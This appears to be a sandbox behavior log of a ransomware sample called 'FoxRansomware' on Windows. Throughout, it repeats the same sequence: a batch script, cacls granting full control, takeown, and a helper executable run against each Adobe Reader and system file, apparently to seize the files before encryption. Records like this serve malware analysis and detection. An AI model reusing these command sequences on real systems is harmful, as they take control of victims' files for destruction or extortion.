C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1060
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif""2⤵PID:2644
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif" /E /G Admin:F /C3⤵PID:2500
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif"3⤵PID:3004
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "distribute_form.gif" -nobanner3⤵PID:3520
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "distribute_form.gif" -nobanner4⤵PID:1764
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3740
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css""2⤵PID:3612
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css" /E /G Admin:F /C3⤵PID:4068
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css"3⤵PID:3108
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "main.css" -nobanner3⤵PID:1668
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "main.css" -nobanner4⤵PID:3644
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3228
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif""2⤵PID:2580
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif" /E /G Admin:F /C3⤵PID:3640
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif"3⤵PID:2424
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "review_shared.gif" -nobanner3⤵PID:2948
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "review_shared.gif" -nobanner4⤵PID:3592
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3724
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif""2⤵PID:976
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif" /E /G Admin:F /C3⤵PID:1628
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif"3⤵
- Modifies file permissions
PID:3912
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner3⤵PID:2928
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner4⤵PID:208
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3544
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf""2⤵PID:2956
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf" /E /G Admin:F /C3⤵PID:3892
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf"3⤵PID:3964
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner3⤵PID:3772
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner4⤵PID:1636
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3552
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf""2⤵PID:3260
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf" /E /G Admin:F /C3⤵PID:3840
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf"3⤵PID:3352
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "MyriadPro-Regular.otf" -nobanner3⤵PID:2636
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "MyriadPro-Regular.otf" -nobanner4⤵PID:212
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1532
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt""2⤵PID:2456
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt" /E /G Admin:F /C3⤵PID:3132
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt"3⤵PID:3036
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner3⤵PID:2172
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner4⤵PID:1664
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3272
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths""2⤵PID:2252
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths" /E /G Admin:F /C3⤵PID:2920
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths"3⤵PID:2664
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "can03.ths" -nobanner3⤵PID:1516
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "can03.ths" -nobanner4⤵PID:2184
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2132
-
-
-
C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp"" | PID 1752
  C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp" /E /G Admin:F /C | PID 3888
  C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp" | PID 2708
  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner | PID 2052
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner | PID 284
  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 3672
C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT"" | PID 2340
  C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT" /E /G Admin:F /C | PID 2524
  C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT" | PID 272
  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "ROMAN.TXT" -nobanner | PID 3620
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "ROMAN.TXT" -nobanner | PID 2736
  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 3564
C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT"" | PID 3044
  C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT" /E /G Admin:F /C | PID 3576
  C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT" | PID 2212
  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "CP1257.TXT" -nobanner | PID 588
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "CP1257.TXT" -nobanner | PID 1920
  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 1776
C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif"" | PID 3540
  C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif" /E /G Admin:F /C | PID 2828
  C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif" | Modifies file permissions | PID 3796
  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "forms_distributed.gif" -nobanner | PID 1912
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "forms_distributed.gif" -nobanner | PID 772
  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 968
C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif"" | PID 2788
  C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif" /E /G Admin:F /C | PID 1216
  C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif" | Modifies file permissions | PID 3748
  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "reviews_sent.gif" -nobanner | PID 1284
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "reviews_sent.gif" -nobanner | PID 2484
  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 3340
C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif"" | PID 2360
  C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif" /E /G Admin:F /C | PID 1952
  C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif" | Modifies file permissions | PID 4080
  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "stop_collection_data.gif" -nobanner | PID 2280
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "stop_collection_data.gif" -nobanner | PID 296
  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 3076
C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm"" | PID 1624
  C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm" /E /G Admin:F /C | PID 3500
  C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm" | PID 3324
  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "ReadMe.htm" -nobanner | PID 4052
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "ReadMe.htm" -nobanner | PID 3516
  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 1744
C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf"" | PID 3688
  C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf" /E /G Admin:F /C | PID 2724
  C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf" | PID 3100
  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "MinionPro-It.otf" -nobanner | PID 2308
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "MinionPro-It.otf" -nobanner | PID 1116
  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 596
C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB"" | PID 3156
  C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB" /E /G Admin:F /C | PID 1792
  C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB" | Modifies file permissions | PID 2696
  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "ZX______.PFB" -nobanner | PID 3420
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "ZX______.PFB" -nobanner | PID 3224
  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 3528
C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp"" | PID 1616
  C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp" /E /G Admin:F /C | PID 3864
  C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp" | PID 3368
  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "brt04.hsp" -nobanner | PID 2376
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "brt04.hsp" -nobanner | PID 3432
  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 3300
C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env"" | PID 2544
  C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env" /E /G Admin:F /C | PID 3288
  C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env" | PID 1696
  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "engphon.env" -nobanner | PID 3476
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "engphon.env" -nobanner | PID 3568
  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 3312
C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT"" | PID 3128
  C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT" /E /G Admin:F /C | PID 3252
  C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT" | PID 3652
  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "CORPCHAR.TXT" -nobanner | PID 2604
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "CORPCHAR.TXT" -nobanner | PID 3248
  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 4024
C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT"" | PID 1276
  C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT" /E /G Admin:F /C | PID 1736
  C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT" | PID 3392
  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "CP1250.TXT" -nobanner | PID 3560
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "CP1250.TXT" -nobanner | PID 2396
  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 2288
C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig"" | PID 3268
  C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig" /E /G Admin:F /C | PID 2460
  C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig" | PID 1292
  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "cryptocme2.sig" -nobanner | PID 2516
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "cryptocme2.sig" -nobanner | PID 2628
  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 892
C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"" | PID 2844
  C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C | PID 2564
  C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" | PID 1956
  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "superbar.png" -nobanner | PID 1176
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "superbar.png" -nobanner | PID 2108
  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 1724
C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml"" | PID 2560
  C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" /E /G Admin:F /C | PID 3428
  C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" | PID 3208
  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "resource.xml" -nobanner | PID 1764
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "resource.xml" -nobanner | PID 2368
  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 3112
C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer"" | PID 916
  C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer" /E /G Admin:F /C | PID 2160
  C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer" | PID 1588
  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "pmd.cer" -nobanner | PID 1796
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "pmd.cer" -nobanner | PID 3376
  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 3612
C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif"" | PID 1336
  C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif" /E /G Admin:F /C | PID 2684
  C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif" | PID 3724
  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "email_initiator.gif" -nobanner | PID 3524
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "email_initiator.gif" -nobanner | PID 2552
  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 2492
C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif"" | PID 3912
  C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif" /E /G Admin:F /C | PID 300
  C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif" | Modifies file permissions | PID 236
  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "pdf.gif" -nobanner | PID 228
